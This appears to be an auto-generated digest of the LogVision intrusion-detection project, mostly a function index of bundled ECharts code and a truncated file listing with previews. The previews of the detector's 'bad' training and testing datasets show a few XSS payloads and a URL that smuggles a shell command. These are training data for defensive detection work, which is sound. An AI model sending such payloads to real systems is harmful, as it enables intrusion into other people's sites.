function toIntTimes (line 69182) | function toIntTimes(times) {
function Single (line 69353) | function Single(axisModel, ecModel, api) {
function create$3 (line 69638) | function create$3(ecModel, api) {
function layout$2 (line 69696) | function layout$2(axisModel, opt) {
function getAxisType$2 (line 69981) | function getAxisType$2(axisName, option) {
function processOnAxis (line 70199) | function processOnAxis(axisInfo, newValue, updaters, dontSnap, outputFin...
function buildPayloadsBySeries (line 70236) | function buildPayloadsBySeries(value, axisInfo) {
function showPointer (line 70299) | function showPointer(showValueMap, axisInfo, value, payloadBatch) {
function showTooltip (line 70303) | function showTooltip(dataByCoordSys, axisInfo, payloadInfo, value) {
function updateModelActually (line 70347) | function updateModelActually(showValueMap, axesInfo, outputFinder) {
function dispatchTooltipActually (line 70377) | function dispatchTooltipActually(dataByCoordSys, point, payload, dispatc...
function dispatchHighDownActually (line 70404) | function dispatchHighDownActually(axesInfo, dispatchAction, api) {
function findInputAxisInfo (line 70442) | function findInputAxisInfo(inputAxesInfo, axisInfo) {
function makeMapperParam (line 70453) | function makeMapperParam(axisInfo) {
function illegalPoint (line 70463) | function illegalPoint(point) {
function register (line 70608) | function register(key, api, handler) {
function initGlobalListeners (line 70622) | function initGlobalListeners(zr, api) {
function dispatchTooltipFinally (line 70647) | function dispatchTooltipFinally(pendings, api) {
function onLeave (line 70664) | function onLeave(record, e, dispatchAction) {
function doEnter (line 70668) | function doEnter(currTrigger, record, e, dispatchAction) {
function makeDispatchAction (line 70672) | function makeDispatchAction(api) {
function unregister (line 70703) | function unregister(key, api) {
function BaseAxisPointer (line 70808) | function BaseAxisPointer() {
function updateProps$1 (line 71259) | function updateProps$1(animationModel, moveAnimation, el, props) {
function propsEqual (line 71269) | function propsEqual(lastProps, newProps) {
function updateLabelShowHide (line 71282) | function updateLabelShowHide(labelEl, axisPointerModel) {
function getHandleTransProps (line 71286) | function getHandleTransProps(trans) {
function updateMandatoryProps (line 71293) | function updateMandatoryProps(group, axisPointerModel, silent) {
function buildElStyle (line 71330) | function buildElStyle(axisPointerModel) {
function buildLabelElOption (line 71348) | function buildLabelElOption(
function confineInContainer (line 71410) | function confineInContainer(position, width, height, api) {
function getValueLabel (line 71428) | function getValueLabel(value, axis, ecModel, seriesDataIndices, opt) {
function getTransformedPosition (line 71469) | function getTransformedPosition(axis, value, layoutInfo) {
function buildCartesianSingleLabelElOption (line 71481) | function buildCartesianSingleLabelElOption(
function makeLineShape (line 71500) | function makeLineShape(p1, p2, xDimIndex) {
function makeRectShape (line 71515) | function makeRectShape(xy, wh, xDimIndex) {
function makeSectorShape (line 71525) | function makeSectorShape(cx, cy, r0, r, startAngle, endAngle) {
function getCartesian (line 71630) | function getCartesian(grid, axis) {
function getAxisDimIndex (line 71665) | function getAxisDimIndex(axis) {
function getPointDimIndex (line 71845) | function getPointDimIndex(axis) {
function getGlobalExtent (line 71849) | function getGlobalExtent(coordSys, dimIndex) {
function keyGetter (line 72205) | function keyGetter(item) {
function process (line 72221) | function process(status, idx, oldIdx) {
function createGridClipShape$2 (line 72324) | function createGridClipShape$2(rect, seriesModel, cb) {
function themeRiverLayout$1 (line 72407) | function themeRiverLayout$1(data, seriesModel, height) {
function computeBaseline (line 72461) | function computeBaseline(data) {
function completeTreeValue$1 (line 72739) | function completeTreeValue$1(dataNode) {
function SunburstPiece (line 72807) | function SunburstPiece(node, seriesModel, ecModel) {
function getLabelAttr (line 73070) | function getLabelAttr(name) {
function getNodeColor (line 73123) | function getNodeColor(node, seriesModel, ecModel) {
function getRootId (line 73159) | function getRootId(node) {
function isNodeHighlighted (line 73169) | function isNodeHighlighted(node, activeNode, policy) {
function fillDefaultColor (line 73185) | function fillDefaultColor(node, seriesModel, color) {
function dualTravel (line 73262) | function dualTravel(newChildren, oldChildren) {
function doRenderNode (line 73285) | function doRenderNode(newNode, oldNode) {
function removeNode (line 73321) | function removeNode(node) {
function renderRollUp (line 73332) | function renderRollUp(virtualRoot, viewRoot) {
function handleRootToNode (line 73472) | function handleRootToNode(model, index) {
function handleHighlight (line 73499) | function handleHighlight(model, index) {
function handleUnhighlight (line 73521) | function handleUnhighlight(model, index) {
function initChildren$1 (line 73698) | function initChildren$1(node, isAsc) {
function sort$2 (line 73718) | function sort$2(children, sortOrder) {
function dataToCoordSize (line 73775) | function dataToCoordSize(dataSize, dataItem) {
function dataToCoordSize$1 (line 73828) | function dataToCoordSize$1(dataSize, dataItem) {
function dataToCoordSize$2 (line 73884) | function dataToCoordSize$2(dataSize, dataItem) {
function dataToCoordSize$3 (line 73934) | function dataToCoordSize$3(dataSize, dataItem) {
function setIncrementalAndHoverLayer (line 74201) | function setIncrementalAndHoverLayer(el) {
function createEl (line 74240) | function createEl(elOption) {
function updateEl (line 74292) | function updateEl(el, dataIndex, elOption, animatableModel, data, isInit...
function prepareStyleTransition (line 74365) | function prepareStyleTransition(prop, targetStyle, elOptionStyle, oldElS...
function makeRenderItem (line 74372) | function makeRenderItem(customSeries, data, ecModel, api) {
function wrapEncodeDef (line 74586) | function wrapEncodeDef(data) {
function createOrUpdate$1 (line 74599) | function createOrUpdate$1(el, dataIndex, elOption, animatableModel, grou...
function doCreateOrUpdate (line 74606) | function doCreateOrUpdate(el, dataIndex, elOption, animatableModel, grou...
function mergeChildren (line 74681) | function mergeChildren(el, dataIndex, elOption, animatableModel, data) {
function diffGroupChildren (line 74729) | function diffGroupChildren(context) {
function getKey (line 74743) | function getKey(item, idx) {
function processAddUpdate (line 74748) | function processAddUpdate(newIndex, oldIndex) {
function applyExtraBefore (line 74766) | function applyExtraBefore(extra, model) {
function applyExtraAfter (line 74776) | function applyExtraAfter(itemStyle, extra) {
function processRemove (line 74786) | function processRemove(oldIndex) {
function getPathData (line 74792) | function getPathData(shape) {
function hasOwnPathData (line 74797) | function hasOwnPathData(shape) {
function hasOwn (line 74801) | function hasOwn(host, prop) {
function getSeriesStackId$1 (line 74843) | function getSeriesStackId$1(seriesModel) {
function getAxisKey$1 (line 74848) | function getAxisKey$1(polar, axis) {
function barLayoutPolar (line 74857) | function barLayoutPolar(seriesType, ecModel, api) {
function calRadialBar (line 74995) | function calRadialBar(barSeries, api) {
function RadiusAxis (line 75137) | function RadiusAxis(scale, radiusExtent) {
function AngleAxis (line 75191) | function AngleAxis(scale, angleExtent) {
function getAxisType$3 (line 75652) | function getAxisType$3(axisDim, option) {
function resizePolar (line 75744) | function resizePolar(polar, polarModel, api) {
function updatePolarScale (line 75776) | function updatePolarScale(ecModel, api) {
function setAxis (line 75818) | function setAxis(axis, axisModel) {
function getAxisLineShape (line 75914) | function getAxisLineShape(polar, rExtent, angle) {
function getRadiusIdx (line 75927) | function getRadiusIdx(polar) {
function fixAngleOverlap (line 75933) | function fixAngleOverlap(list) {
function layoutAxis (line 76455) | function layoutAxis(polar, radiusAxisModel, axisAngle) {
function getLabelPosition (line 76545) | function getLabelPosition(value, axisModel, axisPointerModel, polar, lab...
function makeAction (line 76909) | function makeAction(method, actionInfo) {
function Calendar (line 76976) | function Calendar(calendarModel, ecModel, api) {
function cellSizeSpecified (line 77116) | function cellSizeSpecified(cellSize, idx) {
function doConvert$2 (line 77405) | function doConvert$2(methodName, ecModel, finder, value) {
function mergeAndNormalizeLayoutParams (line 77543) | function mergeAndNormalizeLayoutParams(target, raw) {
function addPoints (line 77725) | function addPoints(date) {
function createEl$1 (line 78517) | function createEl$1(id, targetElParent, elOption, elMap) {
function removeEl (line 78540) | function removeEl(existEl, elMap) {
function getCleanedElOption (line 78552) | function getCleanedElOption(elOption) {
function isSetLoc (line 78563) | function isSetLoc(obj, props) {
function setKeyInfoToNewElOption (line 78571) | function setKeyInfoToNewElOption(resultItem, newElOption) {
function mergeNewElOptionToExist (line 78593) | function mergeNewElOptionToExist(existList, index, newElOption) {
function setLayoutInfoToExist (line 78631) | function setLayoutInfoToExist(existItem, newElOption) {
function setEventData (line 78648) | function setEventData(el, graphicModel, elOption) {
function register$1 (line 78688) | function register$1(name, ctor) {
function get$1 (line 78692) | function get$1(name) {
function layout$3 (line 78811) | function layout$3(group, componentModel, api) {
function makeBackground (line 78838) | function makeBackground(rect, componentModel) {
function processFeature (line 78913) | function processFeature(newIndex, oldIndex) {
function createIconPaths (line 78979) | function createIconPaths(featureModel, feature, featureName) {
function isUserFeatureName (line 79142) | function isUserFeatureName(featureName) {
function SaveAsImage (line 79169) | function SaveAsImage(model) {
function MagicType (line 79266) | function MagicType(model) {
function groupSeries (line 79466) | function groupSeries(ecModel) {
function assembleSeriesWithCategoryAxis (line 79512) | function assembleSeriesWithCategoryAxis(series) {
function assembleOtherSeries (line 79548) | function assembleOtherSeries(series) {
function getContentFromModel (line 79571) | function getContentFromModel(ecModel) {
function trim$1 (line 79588) | function trim$1(str) {
function isTSVFormat (line 79594) | function isTSVFormat(block) {
function parseTSVContents (line 79607) | function parseTSVContents(tsv) {
function parseListContents (line 79636) | function parseListContents(str) {
function parseContents (line 79679) | function parseContents(str, blockMetaList) {
function DataView (line 79711) | function DataView(model) {
function close (line 79794) | function close() {
function tryMergeDataOption (line 79853) | function tryMergeDataOption(newData, originalData) {
function BrushTargetManager (line 79993) | function BrushTargetManager(option, ecModel, opt) {
function formatMinMax (line 80143) | function formatMinMax(minMax) {
function parseFinder$1 (line 80148) | function parseFinder$1(ecModel, option) {
function axisConvert (line 80292) | function axisConvert(axisNameIndex, to, coordSys, rangeOrCoordRange) {
function axisDiffProcessor (line 80332) | function axisDiffProcessor(axisNameIndex, values, refer, scales) {
function getScales (line 80341) | function getScales(xyMinMaxCurr, xyMinMaxOrigin) {
function getSize (line 80350) | function getSize(xyMinMax) {
function push (line 80383) | function push(ecModel, newSnapshot) {
function pop (line 80419) | function pop(ecModel) {
function clear$1 (line 80442) | function clear$1(ecModel) {
function count (line 80450) | function count(ecModel) {
function giveStore (line 80460) | function giveStore(ecModel) {
function isCoordSupported (line 80519) | function isCoordSupported(coordType) {
function createNameEach (line 80531) | function createNameEach(names, attrs) {
function createLinkedNodesFinder (line 80577) | function createLinkedNodesFinder(forEachNode, forEachEdgeType, edgeIdGet...
function restrictSet (line 80887) | function restrictSet(fromWindow, toWindow, fromExtent, toExtent, toValue) {
function isInWindow (line 81044) | function isInWindow(value) {
function calculateDataExtent (line 81050) | function calculateDataExtent(axisProxy, axisDim, seriesModels) {
function fixExtentByAxis (line 81082) | function fixExtentByAxis(axisProxy, dataExtent) {
function setAxisModel (line 81119) | function setAxisModel(axisProxy, isRestore) {
function setMinMaxSpan (line 81141) | function setMinMaxSpan(axisProxy) {
function retrieveRawOption (line 81767) | function retrieveRawOption(option) {
function updateRangeUse (line 81778) | function updateRangeUse(dataZoomModel, inputRawOption) {
function save (line 81866) | function save(coordModel, axisModel, store, coordIndex) {
function DataZoom (line 82124) | function DataZoom(model, ecModel, api) {
function setBatch (line 82230) | function setBatch(dimName, coordSys, minMax) {
function findDataZoom (line 82251) | function findDataZoom(dimName, axisModel, ecModel) {
function retrieveAxisSetting (line 82279) | function retrieveAxisSetting(option) {
function updateBackBtnStatus (line 82290) | function updateBackBtnStatus(featureModel, ecModel) {
function updateZoomBtnStatus (line 82297) | function updateZoomBtnStatus(featureModel, ecModel, view, payload, api) {
function addForAxis (line 82367) | function addForAxis(axisName, dataZoomOpt) {
function forEachComponent (line 82404) | function forEachComponent(mainType, cb) {
function Restore (line 82434) | function Restore(model) {
function assembleTransition (line 82643) | function assembleTransition(duration) {
function assembleFont (line 82657) | function assembleFont(textStyleModel) {
function assembleCssText (line 82683) | function assembleCssText(tooltipModel) {
function makeStyleCoord (line 82730) | function makeStyleCoord(out, zr, appendToBody, zrX, zrY) {
function TooltipContent (line 82765) | function TooltipContent(container, api, opt) {
function TooltipRichContent (line 82978) | function TooltipRichContent(api) {
function buildTooltipModel (line 83866) | function buildTooltipModel(modelCascade) {
function makeDispatchAction$1 (line 83888) | function makeDispatchAction$1(payload, api) {
function refixTooltipPosition (line 83892) | function refixTooltipPosition(x, y, content, viewWidth, viewHeight, gapH...
function confineTooltipPosition (line 83916) | function confineTooltipPosition(x, y, content, viewWidth, viewHeight) {
function calcTooltipPosition (line 83929) | function calcTooltipPosition(position, rect, contentSize) {
function isCenterAlign (line 83961) | function isCenterAlign(align) {
function removeDuplicate (line 84079) | function removeDuplicate(arr) {
function hasKeys (line 84115) | function hasKeys(obj) {
function createVisualMappings (line 84131) | function createVisualMappings(option, stateList, supplementVisualOption) {
function replaceVisualOption (line 84175) | function replaceVisualOption(thisOption, newOption, keys) {
function applyVisual (line 84205) | function applyVisual(stateList, visualMappings, data, getValueState, sco...
function incrementalApplyVisual (line 84258) | function incrementalApplyVisual(stateList, visualMappings, getValueState...
function getLineSelectors (line 84379) | function getLineSelectors(xyIndex) {
function inLineRange (line 84408) | function inLineRange(p, range) {
function layoutCovers (line 84448) | function layoutCovers(ecModel) {
function linkOthers (line 84509) | function linkOthers(seriesIndex) {
function brushed (line 84515) | function brushed(rangeInfoList) {
function stepAParallel (line 84541) | function stepAParallel(seriesModel, seriesIndex) {
function stepAOthers (line 84553) | function stepAOthers(seriesModel, seriesIndex, rangeInfoList) {
function dispatchAction (line 84616) | function dispatchAction(api, throttleType, throttleDelay, brushSelected,...
function doDispatch (line 84643) | function doDispatch(api, brushSelected) {
function checkInRange (line 84655) | function checkInRange(selectorsByBrushType, rangeInfoList, data, dataInd...
function getSelectorsByBrushType (line 84666) | function getSelectorsByBrushType(seriesModel) {
function brushModelNotControll (line 84688) | function brushModelNotControll(brushModel, seriesIndex) {
function bindSelector (line 84699) | function bindSelector(area) {
function getBoundingRectFromMinMax (line 84737) | function getBoundingRectFromMinMax(minMax) {
function generateBrushOption (line 84890) | function generateBrushOption(option, brushOption) {
function updateController (line 85026) | function updateController(brushModel, ecModel, api, payload) {
function Brush (line 85122) | function Brush(model, ecModel, api) {
function compatibleEC2 (line 85529) | function compatibleEC2(opt) {
function transferItem (line 85565) | function transferItem(opt) {
function has$1 (line 85587) | function has$1(obj, attr) {
function setOrigin (line 86348) | function setOrigin(targetGroup) {
function getBound (line 86356) | function getBound(rect) {
function toBound (line 86364) | function toBound(fromPos, from, to, dimIdx, boundIdx) {
function makeBtn (line 86522) | function makeBtn(position, iconPath, onclick, willRotate) {
function handleFrame (line 86615) | function handleFrame() {
function getViewRect$5 (line 86674) | function getViewRect$5(model, api) {
function makeIcon (line 86685) | function makeIcon(timelineModel, objPath, rect, opts) {
function giveSymbol (line 86700) | function giveSymbol(hostModel, itemStyleModel, group, opt, symbol, callb...
function pointerMoveTo (line 86757) | function pointerMoveTo(pointer, dataIndex, axis, timelineModel, noAnimat...
function fillLabel (line 86825) | function fillLabel(opt) {
function hasXOrY (line 87020) | function hasXOrY(item) {
function hasXAndY (line 87024) | function hasXAndY(item) {
function markerTypeCalculatorWithExtent (line 87052) | function markerTypeCalculatorWithExtent(
function dataTransform (line 87114) | function dataTransform(seriesModel, item) {
function getAxisInfo$1 (line 87166) | function getAxisInfo$1(item, data, coordSys, seriesModel) {
function dataDimToCoordDim (line 87186) | function dataDimToCoordDim(seriesModel, dataDim) {
function dataFilter$1 (line 87205) | function dataFilter$1(coordSys, item) {
function dimValueGetter (line 87211) | function dimValueGetter(item, dimName, dataIndex, dimIndex) {
function numCalculate (line 87219) | function numCalculate(data, valueDataDim, type) {
function updateMarkerLayout (line 87311) | function updateMarkerLayout(mpData, seriesModel, api) {
function createList$1 (line 87438) | function createList$1(coordSys, seriesModel, mpModel) {
function isInifinity (line 87647) | function isInifinity(val) {
function ifMarkLineHasOnlyDim (line 87652) | function ifMarkLineHasOnlyDim(dimIndex, fromCoord, toCoord, coordSys) {
function markLineFilter (line 87659) | function markLineFilter(coordSys, item) {
function updateSingleMarkerEndLayout (line 87681) | function updateSingleMarkerEndLayout(
function updateDataVisualAndLayout (line 87861) | function updateDataVisualAndLayout(data, idx, isFrom) {
function createList$2 (line 87887) | function createList$2(coordSys, seriesModel, mlModel) {
function isInifinity$1 (line 88074) | function isInifinity$1(val) {
function ifMarkLineHasOnlyDim$1 (line 88079) | function ifMarkLineHasOnlyDim$1(dimIndex, fromCoord, toCoord, coordSys) {
function markAreaFilter (line 88084) | function markAreaFilter(coordSys, item) {
function getSingleMarkerEndPoint (line 88115) | function getSingleMarkerEndPoint(data, idx, dims, seriesModel, api) {
function createList$3 (line 88309) | function createList$3(coordSys, seriesModel, maModel) {
function legendSelectActionHandler (line 88740) | function legendSelectActionHandler(methodName, payload, ecModel) {
function createSelectorButton (line 89098) | function createSelectorButton(selectorItem) {
function setSymbolStyle (line 89330) | function setSymbolStyle(symbol, symbolType, legendModelItemStyle, border...
function dispatchSelectAction (line 89345) | function dispatchSelectAction(seriesName, dataName, api, excludeSeriesId) {
function dispatchHighlightAction (line 89356) | function dispatchHighlightAction(seriesName, dataName, api, excludeSerie...
function dispatchDownplayAction (line 89369) | function dispatchDownplayAction(seriesName, dataName, api, excludeSeries...
function mergeAndNormalizeLayoutParams$1 (line 89524) | function mergeAndNormalizeLayoutParams$1(legendModel, target, raw) {
function createPageButton (line 89643) | function createPageButton(name, iconIdx) {
function getItemInfo (line 89971) | function getItemInfo(el) {
function intersect (line 89983) | function intersect(itemInfo, winStart) {
function setLabel (line 90795) | function setLabel(handleIndex) {
function getOtherDim (line 90956) | function getOtherDim(thisDim) {
function getCursor (line 90963) | function getCursor(orient) {
function register$2 (line 91064) | function register$2(api, dataZoomInfo) {
function unregister$1 (line 91119) | function unregister$1(api, dataZoomId) {
function generateCoordId (line 91137) | function generateCoordId(coordModel) {
function giveStore$1 (line 91145) | function giveStore$1(api) {
function createController (line 91152) | function createController(api, newRecord) {
function cleanStore (line 91183) | function cleanStore(store) {
function dispatchAction$1 (line 91195) | function dispatchAction$1(api, batch) {
function mergeControllerParams (line 91205) | function mergeControllerParams(dataZoomInfos) {
function makeMover (line 91405) | function makeMover(getPercentDelta) {
function has$2 (line 91606) | function has$2(obj, name) {
function getColorVisual (line 91721) | function getColorVisual(seriesModel, visualMapModel, value, valueState) {
function toFixed (line 92119) | function toFixed(val) {
function completeSingle (line 92200) | function completeSingle(base) {
function completeInactive (line 92239) | function completeInactive(base, stateExist, stateAbsent) {
function completeController (line 92269) | function completeController(controller) {
function setStop (line 92559) | function setStop(value, valueState) {
function getColorStopValues (line 92608) | function getColorStopValues(visualMapModel, valueState, dataExtent) {
function getter (line 92744) | function getter(key) {
function setter (line 92748) | function setter(key, value) {
function getItemAlign (line 92820) | function getItemAlign(visualMapModel, api, itemSize) {
function makeHighDownBatch (line 92858) | function makeHighDownBatch(batch, visualMapModel) {
function createPolygon (line 93671) | function createPolygon(points, cursor, onDrift, onDragEnd) {
function createHandlePoints (line 93685) | function createHandlePoints(handleIndex, textSize) {
function createIndicatorPoints (line 93691) | function createIndicatorPoints(isRange, halfHoverLinkSize, pos, extentMa...
function getHalfHoverLinkSize (line 93703) | function getHalfHoverLinkSize(visualMapModel, dataExtent, sizeExtent) {
function useHoverLinkOnHandle (line 93712) | function useHoverLinkOnHandle(visualMapModel) {
function getCursor$1 (line 93717) | function getCursor$1(orient) {
function has (line 93949) | function has(obj, state, visualType) {
function setStop (line 94101) | function setStop(interval, valueState) {
function normalizeReverse (line 94309) | function normalizeReverse(thisOption, pieceList) {
function renderItem (line 94377) | function renderItem(item) {
function onHoverLink (line 94420) | function onHoverLink(method) {
function createNode (line 94602) | function createNode(tagName) {
function initVML (line 94624) | function initVML() {
function parseInt10$1 (line 95694) | function parseInt10$1(val) {
function VMLPainter (line 95701) | function VMLPainter(root, storage) {
function createMethodNotSupport (line 95871) | function createMethodNotSupport(method) {
function createElement (line 95889) | function createElement(name) {
function round4 (line 95910) | function round4(val) {
function isAroundZero$1 (line 95914) | function isAroundZero$1(val) {
function pathHasFill (line 95918) | function pathHasFill(style, isText) {
function pathHasStroke (line 95923) | function pathHasStroke(style, isText) {
function setTransform (line 95928) | function setTransform(svgEl, m) {
function attr (line 95934) | function attr(el, key, val) {
function attrXLink (line 95941) | function attrXLink(el, key, val) {
function bindStyle (line 95945) | function bindStyle(svgEl, style, isText, el) {
function pathDataToString$1 (line 95992) | function pathDataToString$1(path) {
function setTextTransform (line 96341) | function setTextTransform(textSvgEl, needTransformTextByHostEl, elTransf...
function getTextXForPadding$1 (line 96375) | function getTextXForPadding$1(x, textAlign, textPadding) {
function updateTextLocation (line 96383) | function updateTextLocation(tspan, textAlign, x, y) {
function removeOldTextNode (line 96392) | function removeOldTextNode(el) {
function Diff (line 96419) | function Diff() {}
function execEditLength (line 96455) | function execEditLength() {
function buildValues (line 96549) | function buildValues(diff, components, newArr, oldArr) {
function clonePath (line 96582) | function clonePath(path) {
function Definable (line 96612) | function Definable(
function GradientManager (line 96857) | function GradientManager(zrId, svgRoot) {
function ClippathManager (line 97078) | function ClippathManager(zrId, svgRoot) {
function ShadowManager (line 97245) | function ShadowManager(zrId, svgRoot) {
function hasShadow (line 97431) | function hasShadow(style) {
function parseInt10$2 (line 97444) | function parseInt10$2(val) {
function getSvgProxy (line 97448) | function getSvgProxy(el) {
function checkParentAvailable (line 97463) | function checkParentAvailable(parent, child) {
function insertAfter (line 97467) | function insertAfter(parent, child, prevSibling) {
function prepend (line 97475) | function prepend(parent, child) {
function remove$1 (line 97489) | function remove$1(parent, child) {
function getTextSvgElement (line 97495) | function getTextSvgElement(displayable) {
function getSvgElement (line 97499) | function getSvgElement(displayable) {
function createMethodNotSupport$1 (line 97825) | function createMethodNotSupport$1(method) {
FILE: flask/static/js/echarts/extension/bmap.js
function BMapCoordSys (line 28) | function BMapCoordSys(bmap, api) {
function dataToCoordSize (line 109) | function dataToCoordSize(dataSize, dataItem) {
function createOverlayCtor (line 128) | function createOverlayCtor() {
function v2Equal (line 237) | function v2Equal(a, b) {
function zoomEndHandler (line 321) | function zoomEndHandler() {
FILE: flask/static/js/echarts/extension/dataTool.js
function map (line 134) | function map(obj, cb, context) {
function parse (line 327) | function parse(xml) {
function parseAttributes (line 360) | function parseAttributes(parent) {
function parseNodes (line 370) | function parseNodes(parent, attributesMap) {
function parseEdges (line 444) | function parseEdges(parent) {
function getAttr (line 486) | function getAttr(el, attrName) {
function getChildByTagName (line 490) | function getChildByTagName(parent, tagName) {
function getChildrenByTagName (line 508) | function getChildrenByTagName(parent, tagName) {
function asc (line 593) | function asc(arr) {
function quantile (line 705) | function quantile(ascArr, p) {
FILE: log_gen/log_gen.java
class LogAppender (line 31) | class LogAppender {
method main (line 32) | public static void main(String[] args) {
Condensed preview — 75 files, each showing path, character count, and a content snippet. Download the .json file or copy for the full structured content (7,484K chars).
[
{
"path": ".gitignore",
"chars": 433,
"preview": "# Python\n__pycache__/\n*.py[cod]\n*$py.class\n*.so\n.Python\nbuild/\ndevelop-eggs/\ndist/\ndownloads/\neggs/\n.eggs/\nlib/\nlib64/\np"
},
{
"path": "README.md",
"chars": 2974,
"preview": "# LogVision / 使用大数据的分布式实时日志分析与入侵检测系统\n\b[开发文档](https://xander-wang.github.io/2020/05/09/logvision/)\n## 版本记录(当前2.0)\n- 2018."
},
{
"path": "datasets/learning-datasets/testing/bad.txt",
"chars": 18881,
"preview": "<b <script>alert(1)//</script>0</script></b>\n<b><script<b></b><alert(1)</script </b></b>\n<div id=\"div1\"><input value=\"``"
},
{
"path": "datasets/learning-datasets/testing/good.txt",
"chars": 4630,
"preview": "/jan carbon - creamfields/\n/javascript/ns.sh\n/uhs reader v6/\n/warez-downloads/\n/issue10-news6/\n/000044486/\n/ncsspanish/\n"
},
{
"path": "datasets/learning-datasets/training/bad.txt",
"chars": 3307290,
"preview": "/top.php?stuff='uname >q36497765 #\n/h21y8w52.nsf?<script>cross_site_scripting.nasl</script>\n/ca000001.pl?action=showcart"
},
{
"path": "flask/app.py",
"chars": 19653,
"preview": "# coding=utf-8\nimport ast\nimport time\nfrom kafka import KafkaConsumer\nimport redis\nimport requests\n\nfrom threading impor"
},
{
"path": "flask/requirements.txt",
"chars": 84,
"preview": "Flask_SocketIO==4.3.0\nrequests==2.23.0\nkafka_python==2.0.1\nredis==3.5.0\nflask==1.1.2"
},
{
"path": "flask/static/css/styles.css",
"chars": 14337,
"preview": "body {\n font-family: 'Open Sans', sans-serif;\n background-color: #f7f7f7;\n position: relative;\n margin: 0px;"
},
{
"path": "flask/static/js/echarts/echarts.js",
"chars": 3038694,
"preview": "(function (global, factory) {\n\ttypeof exports === 'object' && typeof module !== 'undefined' ? factory(exports) :\n\ttypeof"
},
{
"path": "flask/static/js/echarts/extension/bmap.js",
"chars": 13931,
"preview": "(function (global, factory) {\n\ttypeof exports === 'object' && typeof module !== 'undefined' ? factory(exports, require('"
},
{
"path": "flask/static/js/echarts/extension/dataTool.js",
"chars": 23034,
"preview": "\n/*\n* Licensed to the Apache Software Foundation (ASF) under one\n* or more contributor license agreements. See the NOTI"
},
{
"path": "flask/static/js/echarts/map/js/china.js",
"chars": 44240,
"preview": "/*\n* Licensed to the Apache Software Foundation (ASF) under one\n* or more contributor license agreements. See the NOTIC"
},
{
"path": "flask/static/js/echarts/map/js/world.js",
"chars": 102386,
"preview": "/*\n* Licensed to the Apache Software Foundation (ASF) under one\n* or more contributor license agreements. See the NOTIC"
},
{
"path": "flask/templates/about.html",
"chars": 2793,
"preview": "<!DOCTYPE html>\n<html>\n\n<head>\n <title>LogVision-关于系统</title>\n <meta name=\"viewport\" content=\"width=device-width, "
},
{
"path": "flask/templates/analysis.html",
"chars": 38866,
"preview": "<!DOCTYPE html>\n<html>\n\n<head>\n <title>LogVision-日志分析</title>\n <meta name=\"viewport\" content=\"width=device-width, "
},
{
"path": "flask/templates/id.html",
"chars": 33077,
"preview": "<!DOCTYPE html>\n<html>\n\n<head>\n <title>LogVision-入侵检测</title>\n <meta name=\"viewport\" content=\"width=device-width, "
},
{
"path": "flask/templates/index.html",
"chars": 4249,
"preview": "<!DOCTYPE html>\n<html lang=\"en\">\n\n<head>\n <title>LogVision-欢迎</title>\n <meta name=\"viewport\" content=\"width=device"
},
{
"path": "flume/standalone.conf",
"chars": 682,
"preview": "# LogVision Flume Configuration:\r\n\r\nlogv-source.sources = src\r\nlogv-source.sinks = sink\r\nlogv-source.channels = channel\r"
},
{
"path": "log_gen/log_gen.java",
"chars": 3213,
"preview": "/*\n log_gen|\b模拟日志生成器 v2.0 by Xander on 2020.2.24\n \n 这一简单的Java实现可根据传入参数(每次写入行数、写入间隔时间)将样本日志中的特定\n 行块追加至目标日志中,以"
},
{
"path": "spark/build.sbt",
"chars": 557,
"preview": "\nname := \"logv_compute\"\n\nversion := \"0.1\"\n\nscalaVersion := \"2.11.12\"\n\nlibraryDependencies ++= Seq(\n \"org.apache.spark\" "
},
{
"path": "spark/project/assembly.sbt",
"chars": 57,
"preview": "addSbtPlugin(\"com.eed3si9n\" % \"sbt-assembly\" % \"0.14.10\")"
},
{
"path": "spark/project/build.properties",
"chars": 19,
"preview": "sbt.version = 1.3.8"
},
{
"path": "spark/project/project/target/config-classes/$43a0538f7780cac449ae.cache",
"chars": 21,
"preview": "sbt.internal.DslEntry"
},
{
"path": "spark/project/target/config-classes/$16828faecf688d54d497.cache",
"chars": 21,
"preview": "sbt.internal.DslEntry"
},
{
"path": "spark/project/target/config-classes/$30003e6e888c6501d0a9.cache",
"chars": 21,
"preview": "sbt.internal.DslEntry"
},
{
"path": "spark/project/target/config-classes/$3d85af9b26c1a259b49e.cache",
"chars": 21,
"preview": "sbt.internal.DslEntry"
},
{
"path": "spark/project/target/config-classes/$46bc225346f5c722f39f.cache",
"chars": 21,
"preview": "sbt.internal.DslEntry"
},
{
"path": "spark/project/target/config-classes/$da50ce791668c9ed0f15.cache",
"chars": 21,
"preview": "sbt.internal.DslEntry"
},
{
"path": "spark/project/target/config-classes/$f2cabef45cb06cd331f1.cache",
"chars": 21,
"preview": "sbt.internal.DslEntry"
},
{
"path": "spark/project/target/scala-2.12/sbt-1.0/update/update_cache_2.12/inputs",
"chars": 10,
"preview": "-164808489"
},
{
"path": "spark/project/target/scala-2.12/sbt-1.0/update/update_cache_2.12/output",
"chars": 368262,
"preview": "{\"cachedDescriptor\":\".\",\"configurations\":[{\"configuration\":{\"name\":\"plugin\"},\"modules\":[],\"details\":[]},{\"configuration\""
},
{
"path": "spark/project/target/streams/_global/_global/_global/streams/out",
"chars": 0,
"preview": ""
},
{
"path": "spark/project/target/streams/_global/_global/csrLogger/_global/streams/out",
"chars": 3632,
"preview": "\u001b[0m[\u001b[0m\u001b[0mdebug\u001b[0m] \u001b[0m\u001b[0mdownloaded https://repo1.maven.org/maven2/org/jetbrains/sbt-idea-shell_2.12_1.0/2018.3/s"
},
{
"path": "spark/project/target/streams/_global/csrConfiguration/_global/streams/out",
"chars": 0,
"preview": ""
},
{
"path": "spark/project/target/streams/_global/csrProject/_global/streams/out",
"chars": 0,
"preview": ""
},
{
"path": "spark/project/target/streams/_global/dependencyPositions/_global/streams/update_cache_2.12/input_dsp",
"chars": 10,
"preview": "1495877195"
},
{
"path": "spark/project/target/streams/_global/dependencyPositions/_global/streams/update_cache_2.12/output_dsp",
"chars": 961,
"preview": "{\"{\\\"organization\\\":\\\"org.scala-lang\\\",\\\"name\\\":\\\"scala-library\\\",\\\"revision\\\":\\\"2.12.10\\\",\\\"configurations\\\":\\\"provided"
},
{
"path": "spark/project/target/streams/_global/ivyConfiguration/_global/streams/out",
"chars": 0,
"preview": ""
},
{
"path": "spark/project/target/streams/_global/ivySbt/_global/streams/out",
"chars": 0,
"preview": ""
},
{
"path": "spark/project/target/streams/_global/moduleSettings/_global/streams/out",
"chars": 0,
"preview": ""
},
{
"path": "spark/project/target/streams/_global/projectDescriptors/_global/streams/out",
"chars": 0,
"preview": ""
},
{
"path": "spark/project/target/streams/_global/scalaCompilerBridgeScope/_global/streams/out",
